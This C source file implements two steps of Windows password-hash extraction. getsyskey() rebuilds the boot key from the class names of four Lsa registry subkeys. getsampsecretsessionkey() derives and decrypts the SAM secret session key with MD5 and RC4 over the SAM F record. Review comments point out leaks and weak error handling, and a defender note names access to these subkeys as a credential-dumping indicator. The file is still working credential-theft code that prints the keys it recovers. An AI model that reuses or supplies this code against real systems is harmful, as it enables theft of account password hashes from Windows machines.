#include "sessionkey.h"
/*
 * getsyskey - rebuild the 16-byte Windows "syskey" (boot key) from the class
 * names of four subkeys under HKLM\SYSTEM\CurrentControlSet\Control\Lsa and
 * print it to stdout.
 *
 * syskey: caller-supplied buffer that must hold at least 0x10 bytes. It is
 *         written only at the very end; on any early return (Lsa key cannot be
 *         opened, or a class name contains a non-hex character) it is left
 *         UNTOUCHED, so a caller that does not pre-initialize it may read junk.
 *
 * Mechanics visible below: each of the subkeys JD, Skew1, GBG and Data is
 * expected to carry an 8-character hex class name; each is packed into 4
 * bytes and appended to syskey1 in that order, then the 16 bytes are scattered
 * into syskey through the keyselect[] permutation (syskey1[i] lands at
 * syskey[keyselect[i]]).
 *
 * Review notes:
 *  - hkResult (the Lsa key) is never closed, so the handle leaks on every
 *    path, including the early returns inside the hex-parsing loops.
 *  - A subkey that fails to open or query is silently skipped: i is not
 *    advanced, the bytes stay zero from the memset, and the function still
 *    prints and returns a plausible-looking but wrong key. There is no error
 *    result for the caller.
 *  - The class length reported back in c1 is never checked, yet exactly 8
 *    characters are parsed; a shorter class name means bytes past the
 *    terminator are inspected (they will normally fail the hex test and hit
 *    the early return, but only by accident).
 *  - The four per-subkey stanzas are identical copy-pastes; a single helper
 *    taking the subkey name would remove the duplication and make the
 *    missing-handle cleanup easy to do in one place.
 *  - NOTE(review): the printf calls leak key material to stdout; anything
 *    capturing this program's output gets the boot key.
 *  - Defender note: access to the class names of these four Lsa subkeys by
 *    anything other than the OS itself is a well-known credential-dumping
 *    indicator and is worth monitoring/alerting on.
 */
void getsyskey(unsigned char * syskey)
{
/* Permutation applied to the concatenated JD|Skew1|GBG|Data bytes (see the
 * final loop): source byte i goes to destination index keyselect[i]. */
unsigned char keyselect[]={0x8,0xA,0x3,0x7,0x2,0x1,0x9,0xF,
0x0,0x5,0xd,0x4,0xb,0x6,0xc,0xe};
unsigned char syskey1[0x10];    /* un-permuted key bytes, filled 4 at a time */
HKEY hkResult;                  /* ...\Control\Lsa -- never closed (leak) */
HKEY hkResult1;                 /* current subkey; closed after each query */
int i,j;                        /* i: write offset into syskey1; j: hex digit index */
long ss;                        /* Win32 status of the last registry call */
unsigned char classinfo[0x10];  /* class-name buffer; reused for all four subkeys */
DWORD c1;                       /* in: sizeof classinfo; out: class length (unchecked) */
ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Lsa",0,KEY_READ,&hkResult);
if(ss!=ERROR_SUCCESS)
return;   /* syskey not written */
ss=RegOpenKeyEx(hkResult,"JD",0,KEY_READ,&hkResult1);
i=0;
memset(syskey1,0,0x10);   /* skipped subkeys leave zero bytes here */
c1=0x10;
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,(LPSTR) classinfo,&c1,0,0,0,0,0,0,0,0,0);// c1 is in/out; the returned length is not validated before parsing 8 chars
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("JD:%s\n",classinfo);   /* relies on the API NUL-terminating the class */
/* Convert the 8 ASCII hex digits in place to their nibble values 0..15. */
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;   /* non-hex character: abandon; hkResult leaks, syskey untouched */
}
/* Pack nibble pairs into bytes, high nibble first. */
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
/* Skew1: same procedure as JD; i is only advanced on success. */
c1=0x10;
ss=RegOpenKeyEx(hkResult,"Skew1",0,KEY_READ,&hkResult1);
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,(LPSTR) classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("Skew1:%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;   /* same leak / untouched-output caveat as above */
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
/* GBG: same procedure. */
c1=0x10;
ss=RegOpenKeyEx(hkResult,"GBG",0,KEY_READ,&hkResult1);
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,(LPSTR) classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("GBG:%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;   /* same leak / untouched-output caveat as above */
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
/* Data: same procedure. After this, i==16 only if all four subkeys parsed. */
c1=0x10;
ss=RegOpenKeyEx(hkResult,"Data",0,KEY_READ,&hkResult1);
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,(LPSTR) classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("Data:%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;   /* same leak / untouched-output caveat as above */
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
/* Permute into the caller's buffer. Note: i (how many bytes were actually
 * filled) is not consulted here, so a partial fill yields a wrong key with
 * no error indication. hkResult is still open at this point. */
for(i=0;i<0x10;i++)
{
syskey[keyselect[i]]=syskey1[i];
}
printf("SYSKEY: ");
for(i=0;i<0x10;i++)
printf("%02X ",syskey[i]);
printf("\n");
}
/*
 * getsampsecretsessionkey - derive the SAM "secret session key" from the boot
 * key and the SAM F record, and RC4-decrypt 0x20 bytes of that record with it.
 *
 * syskey:    16-byte boot key (as produced by getsyskey()); 0x10 bytes read.
 * fkey:      SAM F record. Bytes 0x70..0x7F feed the MD5 and bytes 0x80..0x9F
 *            are the RC4 input, so the buffer must be at least 0xA0 bytes --
 *            no length is passed and nothing here checks one.
 * secretkey: receives 0x20 bytes of RC4 output; only the first 0x10 bytes
 *            are printed.
 *
 * Key schedule, as written below:
 *   md5hash = MD5( fkey[0x70..0x7F] || aqwerty || syskey || anum )
 * where aqwerty and anum are fed at 0x2f and 0x29 bytes respectively, i.e.
 * their full string lengths (0x2e and 0x28) PLUS the terminating NUL -- the
 * NUL is part of the hashed input, so do not "fix" these lengths to strlen().
 * The RC4 key is the raw 16-byte MD5 digest.
 *
 * Review notes:
 *  - MD5 and RC4 appear here because they are what the parsed on-disk format
 *    uses (presumably; not established by this file) -- they are not a
 *    design choice to carry into new code.
 *  - Neither md5hash nor rc4k is wiped before return; key material remains on
 *    the stack, and the printf leaks the derived key to stdout.
 *  - No return value: the caller cannot tell this apart from a call that
 *    was given a too-short fkey.
 */
void getsampsecretsessionkey(unsigned char * syskey,unsigned char * fkey,unsigned char * secretkey)
{
char aqwerty[]="!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%";   /* 0x2e chars + NUL */
char anum[]="0123456789012345678901234567890123456789";            /* 0x28 chars + NUL */
MD5_CTX md5c;
unsigned char md5hash[0x10];   /* becomes the RC4 key; not zeroized afterwards */
RC4_KEY rc4k;
MD5_Init( &md5c );
MD5_Update( &md5c, &fkey[0x70], 0x10 );   /* F record bytes 0x70..0x7F */
MD5_Update( &md5c, aqwerty, 0x2f );       /* includes the terminating NUL */
MD5_Update( &md5c, syskey, 0x10 );
MD5_Update( &md5c, anum, 0x29 );          /* includes the terminating NUL */
MD5_Final( md5hash, &md5c );
RC4_set_key( &rc4k, 0x10, md5hash );
RC4( &rc4k, 0x20, &fkey[0x80], secretkey );   /* F record bytes 0x80..0x9F -> secretkey[0..0x1F] */
printf("SecretSessionKey: ");
for(int i=0;i<0x10;i++)   /* only the first half of the 0x20-byte output is shown */
printf("%02X ",secretkey[i]);
printf("\n");
}